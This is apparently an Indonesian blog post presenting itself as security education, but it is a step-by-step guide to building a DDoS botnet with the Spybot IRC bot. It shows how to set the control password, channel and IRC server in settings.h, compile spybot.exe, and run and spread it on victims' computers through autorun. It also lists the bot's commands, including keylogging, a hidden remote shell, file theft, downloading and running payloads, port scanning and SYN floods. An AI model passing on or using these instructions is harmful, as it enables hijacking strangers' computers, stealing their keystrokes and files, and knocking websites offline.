Zombie Pada D_dOS (Denial of servie)

DENIAL OF SERVICE

Believed or not sekelas kaskus pun juga pernah kena serangan ini sehingga mereka down dan bahkan database nya hancur dan tidak bisa direstore sehingga memaksa banyak thread yang di lock. Serangan ini pula yang memaksa gedung putih memindahkan server mereka setelah membuat marah hacker dari cina dan serangan yang membuat situs microsoft tidak bisa diakses. Anda bisa membayangkan betapa berbahayanya serangan tanpa obat seperti ini .Tulisan ini saya kutip dari tulisan R3yr3 yang memang selalu berbagi masalah security.Dengan tujuan berbagi sesama dan belajar terutama dalam internet security.

Hacker yang melancarkan serangan DDoS, haruslah mempunyai banyak komputer yang siap diperintah. Komputer komputer ini dinamakan zombie. Hacker akan memerintahkan komputer zombie melalui perantara yang dinamakan sebagai master, disini kita akan menggunakan perantara(master) yaitu mIRC .

ketika sang hacker hendak melakukan serangan DDoS, ia hanya perlu masuk ke komputer yang bertindak sebagai MASTER ini. Kemudian memberikan perintah dari situ. Semua komputer zombie yang mendengarkan perintah dari tuannya akan segera melakukan serangan terhadap komputer korban yang di tentukan oleh hacker.

bijimana MENCARI ZOMBIE ?

Untuk melakukan serangan DDoS, syarat utamanya adalah memiliki pasuka Zombie sebanyak banyaknya. Semakin banyak seseorang memiliki komputer zombie, maka kekuatannya semakin besar dan dengan mudah ia bisa membuat situs manapun yang tidak mempunyai bandwidh yang sebanding dengan nya untuk down. Sebesar apapun bandwidh, pastilah ada batasnya dan ini adalah inti dari serangan DDoS.

ZOMBIE TIDAK HANYA UNTUK DDoS !

Seorang hacker yang memiliki banyak zombie, tidak hanya memanfaatkan pasukannya untuk melakukan serangan DDoS. Hacker bisa melakukan banyak sekali ha-hal yang mengerikan dengan pasukannya, diantaranya adalah :

1. sebagai SPAMMER.
2. Pay Per Click ( PPC ).
3. Pencurian bandwidh dan space.

dan sekarang kita membahas cara membuat nya…

SPYBOT

Spybot merupakan salah satu bot yang terkenal di dunia Cyb3R atau Und3R Gr0unD dan sangat luas digunakan oleh para hacker. Bot ini dibuat dengan bahasa C oleh Mich yang sebelumnya disebarkan secara terbatas melalui situs nya .

Karena program ini berupa source code, Anda harus melakukan proses kompilasi yang sering menakutkan pengguna awam. Namun, Anda tidak perlu khawatir, pembuat program ini telah menyediakan sebuah batch file yang tinggal anda klik dana selesailah sudah.

Saya mendownload compiler gratis bahasa C seperti yang disarankan yaitu lcc-win32, program ini saya akan upload. Sangatlah mudah dan tidak ada yang perlu diceritakan lebih lanjut. Anda hanya perlu klik next,next,finish dan selesai.

File sumber SPYBOT terdiri atas file spybot.c yang merupakan source kod file sedangkan konfigurasi disimpan pada file yang berbeda yaitu settings.h . Anda menetukan sifat dan karakterik file spybot yang hendak diciptakan melalui file settings.ini .

Sebagai contoh nya, saya mengambil beberapa baris pntig pada file settings.h

char password[] = “passwordanda”; //bots password
char channel[] = “#channelanda”; //channel bot joins on connect

pada baris password[] merupakan password untuk memerintah bot, tanpa mengetahui password ini, bot akan diam seribu bahasa ketika anda perintahkan melakukan sesuatu.

Secara deffault, password yang digunakan adalah “passwordanda” ….

Secara deffault channel tersebut diset dengan #channelanda .

mIRC mempunyai banyak sekali jaringan-jaringan yang berdiri sendiri. Misalnya, server-server dalam kelompok dalnet, tidak bisa berhubungan dengan server-server dalam kelompok undernet karena keduanya saling berdiri sendiri…

Karena itu, kita juga perlu menentukan server mana channel #channelanda akan dibuat. Baris yang menentukan hal ini berada pada baris berikut :

//servers

char *ircservers[]={
“127.0.0.1″,
“irc.icq.com”,
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
6667,
6666,

};

Secara deffault server yang akan digunakan dimasukkan kedalam array bernama ircservers yang secara deffault menggunakan 127.0.0.1 dan server irc.icq.com. Nomor port yang digunakan harus sesuai jumlahnya dengan server yang digunakan karena menggunakan dua server, terdapat dua port yang digunakan yaitu 6667 dan 6666.

jika anda hendak merubahnya ke server dalnet misalnya, Anda juga harus mengetahui port yang digunakan oleh server tersebut dan mengisinya pada baris serverports[].

Untuk mengetahui nama server dan juga nama port server mIRC, Anda bisa mendownload list server-server mIRC dari internet. Saya menggunakan software mIRC dan dari situ juga bisa dilihat dengan mengklik tombol Option>Connect>Servers>Pilih Server IRC>Edit.

terlihat server irc.icq.com termasuk dalam kategori group IrCQNet. Pada contoh ini, Saya tidak akan merubah server yang digunakan dan hanya menghapus server lokal 127.0.0.1 karena memang tidak di perlukan. Code akhir setelah saya edit akan tampak seperti berikut..

char *ircservers[]={
“irc.icq.com”,
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
7000,

};

Setelah proses konfigurasi selesai dilakukan, saatnya untuk melakukan kompilasi. Klik file “Make spybot.bat” yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban. anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban.. dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini…

Berikut adalah fungsi menarik yang tersedia :
*ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h

Login password = untuk memerintahkan bot yang diberi password, Anda harus login terlebih dahulu dengan perintah ini

raw [raw command] = Mengirimkan perintah-perintah ke IRC. Anda bisa mempelajari perintah IRC untuk mengetahuinya lebih lanjut (contoh: raw PRIVMSG #spybot1.1:hello)

list [path+filter] = Melihat file, sama dengan perintah dir. (contoh list c:\*.*)

delete [filename] = menghapus file. (contoh : delete c:\windows\netstat.exe)

executa [filename] = Menjalankan file atau program. (contoh : execute c:\windows\system32\notepad.exe). program notepad akan di jalankan di komputer zombie.

rename [originalfile] [newfile] = Merubah nama file (contoh : rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)

makedir [dirname] = Membuat direktory (contoh : makedir c:\test\ )

startkeylogger = menjalankan keylogger di komputer zombie.

stop keylogger = mematikan keylogger di komputer zombie.

sendkeys [keys] = Mensimulasikan ketikan keyboard. Anda bisa mengirimkan ketikan keyboard dengan perintah ini. Sebagai contohnya, jika anda mengirimkan perintah “sendkeys zom-zom” maka tulisan om-zom akan terkirim. Saya tidak mengetahui kenapa huruf pertamanya hilang namun, anda bisa menceganya dengan menggunakan spasi di depan karakter yang hendak di kirim

keyboardlights = Menyalakan lampu keyboard sebanyak 50 kali ( tindakan iseng ).

info = memberikan informasi tentang komputer zombie.

listprocesses = melihat proses yang sedang berjalan di komputer zombie.

killprocess [processname] = mematikan proses(contoh : killprocess firefox.exe)

reconnect = memintah komputer zombi untuk disconnect dari server IRC dan melakukan koneksi kembali.

disconnect [sec.] = meminta komputer zombie untuk disconnect dari IRC dalam beberapa waktu tertentu.

quit = mematikan bot

reboot = reboot komputer zombie

cd-rom [0/1] = jika 0 maka akan menutup cd-rom, jika 1 maka akan membuka cd-rom. httpserver [port] [root-dir] = menjalankan fungsu server web. (contoh : httpserver 80 C:\ ).dengan perintah ini anda bisa mem-browse ke alamat IP zombie dan melihat semua file yang ada di drive C dengan browser.

syn [host] [port] [delat msec.] [times] = melakukan serangan syn (contoh : syn 127.0.0.1 80 100 1000)

Threads = Menampilkan semua proses yang sedang di jalankan oleh bot.

killthread [number] = mematikan proses, number adalah nomor yang di dapatkan pada threads sebelumnya.

get [filename] = mengambil file yang ada di komputer zombie.

opencmd = menjalankan program cmd pada komputer zombie dalam modus tersembunyi..

cmd [command] = mengirim perintah . (sebelumnya harus menggunakan opencmd).

scan [start ip address] [port] [delay] [filename] = melakukan scanning (contoh :
scan 127.0.0.1 17300 1 portscan.txt

download [url] [filename] = mendownload file dari internet. (contoh : download http://127.0.0.0/server.exe c:\server.exe

uninstall = uninstall program bot dari komputer korban. Perintah ini akan membuat program bot tidak aktif lagi di komputer korban namun file bot nya sendiri tidak terhapus.